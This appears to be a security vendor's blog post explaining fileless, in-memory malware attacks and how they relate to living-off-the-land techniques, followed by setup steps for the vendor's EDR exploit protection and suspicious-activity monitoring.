When you hear about malware, there's a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks–and while they can be bad, they're nothing compared to their fileless cousins.
As the name suggests, fileless attacks don't rely on traditional executable files to get the job done but rather** in-memory execution**, which helps them evade detection by conventional security solutions.
In this post, we'll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.
In contrast to file-based attacks that execute the payload in the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly into memory instead of the hard drive has several benefits, such as:
If you read our article on LOTL attacks, you may be confused: Aren't fileless attacks and LOTL attacks the same thing? Well, yes and no.
LOTL attacks are anytime an attacker leverages legitimate tools to evade detection, steal data, and more, while fileless attacks refer purely to executing code directly into memory. While both types of attacks often overlap, they are not synonymous.
Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute payload into memory, but they can also do so without leveraging a legitimate system tool or process at all.
PowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened. Source.
For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).
On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.
Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.
Below are five common techniques used in fileless attacks:
Note that fileless attacks often rely on exploiting vulnerabilities in system components in each of these instances (such as Office or web-browsers) to execute their code.
Prevention Method | Description |
---|---|
Keep software and systems updated | Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers. Regularly review security logs |
Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.
To configure Exploit Protection Advanced settings, follow these steps:
Go to Configure > Policies in Nebula.
Select a policy and navigate to** Protection settings > Advanced settings > Anti-exploit settings.**
Exploit Protection settings in a policy in Malwarebytes EDR.
Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:
Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.
To enable Suspicious Activity Monitoring in your policy:
Suspicious Activity monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.
Advanced Settings offer additional options for activity monitoring. To configure these settings:
Flight Recorder Search collects all endpoint events within its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring processes, registry, file system, and network activity on the endpoint.
Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection.